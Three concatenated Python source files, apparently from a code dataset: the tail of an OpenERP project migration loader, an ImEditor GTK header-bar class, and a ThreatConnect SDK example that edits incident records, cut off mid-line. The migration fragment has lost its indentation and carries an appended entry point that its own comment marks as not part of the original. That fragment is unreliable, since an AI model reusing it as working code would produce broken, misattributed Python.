'project.issue', 'write', [
project_id],
{'task_id': task_id})
task_works = searchWorks(int(task[0]), works)
if task_works:
for work in task_works:
values_works = {
'name': ustr(work[1]),
'hours': work[2],
'date': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'user_id': values_issue['assigned_to'],
'task_id': task_id,
}
work_id = object_proxy.execute(
DB, uid, PASS, 'project.task.work',
'create', values_works)
if work_id:
object_proxy.execute(DB, uid, PASS,
'project.task', 'write', [
task_id], {'state': task[4]})
object_proxy.execute(DB, uid, PASS, 'project.issue', 'write', [
project_id], {'state': issue[9]})
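# Illustrative entry point (not part of the original module): `argv` is
# imported above but never used, so presumably the loader was invoked with
# connection details on the command line; the argument order here is an
# assumption.
if __name__ == '__main__':
    if len(argv) == 7:
        fname, host, port, db, user, passwd = argv[1:7]
        loadProjectsTasks(fname, host, int(port), db, user, passwd)
    else:
        print('usage: migrate.py <xls_file> <host> <port> <db> <user> <password>')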
|
ImEditor/ImEditor
|
src/interface/headerbar.py
|
Python
|
gpl-3.0
| 711 | 0.004219 |
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gio
UI_PATH = '/io/github/ImEditor/ui/'
class ImEditorHeaderBar():
__gtype_name__ = 'ImEditorHeaderBar'
def __init__(self):
builder = Gtk.Builder.new_from_resource(UI_PATH + 'headerbar.ui')
self.header_bar = builder.get_object('header_bar')
self.menu_button = builder.get_object('menu_button')
        self.select_button = builder.get_object('select_button')
self.pencil_button = builder.get_object('pencil_button')
builder.add_from_resource(UI_PATH + 'menu.ui')
self.window_menu = builder.get_object('window-menu')
self.menu_button.set_menu_model(self.window_menu)
|
percipient/threatconnect-python
|
examples/commit/incidents_commit.py
|
Python
|
apache-2.0
| 8,526 | 0.002698 |
# -*- coding: utf-8 -*-
""" standard """
from random import randint
import re
""" custom """
from examples.working_init import *
from threatconnect.Config.ResourceType import ResourceType
#
# CHANGE FOR YOUR TESTING ENVIRONMENT
# - These incidents must be created before running this script
#
owner = 'Example Community' # org or community
lu_id = 34 # incident id for loop update
mu_id = 35 # incident id for manual update
# dl_id = 999999 # threat id to delete
adversary_id = 5 # adversary resource id to associate with incident
victim_id = 1 # victim resource id to associate with incident
ip_address = '10.20.30.40'  # address indicator to associate with incident
rn = randint(1, 1000) # random number generator for testing
def main():
""" """
# (Optional) SET THREAT CONNECT LOG (TCL) LEVEL
tc.set_tcl_file('log/tc.log', 'debug')
tc.set_tcl_console_level('critical')
# (Required) Instantiate a Resource Object
resources = tc.incidents()
#
# (Optional) retrieve results from API and update selected resource in loop
#
# filters can be set to limit search results
try:
filter1 = resources.add_filter()
filter1.add_owner(owner) # filter on owner
except AttributeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
try:
resources.retrieve()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
for res in resources:
# a particular resource can be matched by ID, Name or any other supported attribute
if res.id == lu_id:
#
# once a resource is matched any metadata on that resource can be updated
#
res.set_name('LU Incident #{0:d}'.format(rn))
# additional properties can be updated
res.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
#
# working with indicator associations
#
# existing indicator associations can be retrieved and iterated through
for association in res.indicator_associations:
# add delete flag to all indicator association that have a confidence under 10
if association.confidence < 10:
res.disassociate_indicator(association.resource_type, association.indicator)
# indicator associations can be added to a resource by providing the resource type and value
res.associate_indicator(ResourceType.ADDRESSES, ip_address)
#
# working with group associations
#
# existing group associations can be retrieved and iterated through
for association in res.group_associations:
# add delete flag to all group association that match DELETE
if re.findall('LU', association.name):
res.disassociate_group(association.resource_type, association.id)
# group associations can be added to a resource by providing the resource type and id
res.associate_group(ResourceType.ADVERSARIES, adversary_id)
#
# working with victim associations
#
# existing victim associations can be retrieved and iterated through
for association in res.victim_associations:
# add delete flag to all group association that match DELETE
if re.findall('LU', association.name):
res.disassociate_victim(association.id)
# victim associations can be added to a resource by providing the resource id
res.associate_victim(victim_id)
#
# working with attributes
#
# existing attributes can be loaded into the resource and iterated through
res.load_attributes()
for attribute in res.attributes:
# add delete flag to all attributes that have 'test' in the value.
if re.findall('test', attribute.value):
res.delete_attribute(attribute.id)
# add update flag to all attributes that have 'update' in the value.
if re.findall('update', attribute.value):
res.update_attribute(attribute.id, 'updated attribute #{0:d}'.format(rn))
# attributes can be added to a resource by providing the attribute type and value
res.add_attribute('Description', 'test attribute #{0:d}'.format(rn))
#
# working with tags
#
# existing tags can be loaded into the resource and iterated through
res.load_tags()
for tag in res.tags:
# add delete flag to all tags that have 'DELETE' in the name.
if re.findall('DELETE', tag.name):
res.delete_tag(tag.name)
# tags can be added to a resource by providing the tags value
res.add_tag('DELETE #{0:d}'.format(rn))
# (Required) commit this resource
try:
print('Updating resource {0!s}.'.format(res.name))
res.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) delete resource if required
#
# delete to any resource that has 'DELETE' in the name.
elif re.findall('DELETE', res.name):
try:
print('Deleting resource {0!s}.'.format(res.name))
res.delete() # this action is equivalent to commit
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) ADD RESOURCE EXAMPLE
#
# new resources can be added with the resource add method
resource = resources.add('DELETE #{0:d}'.format(rn), owner)
# additional properties can be added
resource.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
# attributes can be added to the new resource
resource.add_attribute('Description', 'Delete Example #{0:d}'.format(rn))
# tags can be added to the new resource
resource.add_tag('TAG #{0:d}'.format(rn))
# the security label can be set on the new resource
resource.set_security_label('TLP Green')
# commit this resource and add attributes, tags and security labels
try:
print('Adding resource {0!s}.'.format(resource.name))
resource.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) UPDATE RESOURCE EXAMPLE
#
# existing resources can also be updated with the resource add method
resource = resources.add('MU Incident #{0:d}'.format(rn), owner) # this will overwrite exising resource name
resource.set_id(mu_id) # set the id to the existing resource
# additional properties can be updated
resource.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
# existing attributes can be loaded for modification or deletion
resource.load_attributes()
for attribute in resource.attributes:
if attribute.type == 'Description':
resource.delete_attribute(attribute.id)
# attributes can be added to the existing resource
resource.add_attribute('Description', 'Manual Update Example #{0:d}'.format(rn))
# existing tags can be loaded for modification or deletion
resource.load_tags()
for tag in resource.tags:
resource.delete_tag(tag.name)
# tags can be added to the existing resource
resource.add_tag('TAG #{0:d}'.format(rn))
# commit this resource and add attributes, tags and security labels
try:
print('Updating resource {0!s}.'.format(resource.name))
resource.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) DELETE RESOURCE EXAMPLE
#
# resources can be deleted with the resource add method
    # resource = resources.add(''.format(rn), owner)  # a valid resource name is not required
# resource.set_id(dl
|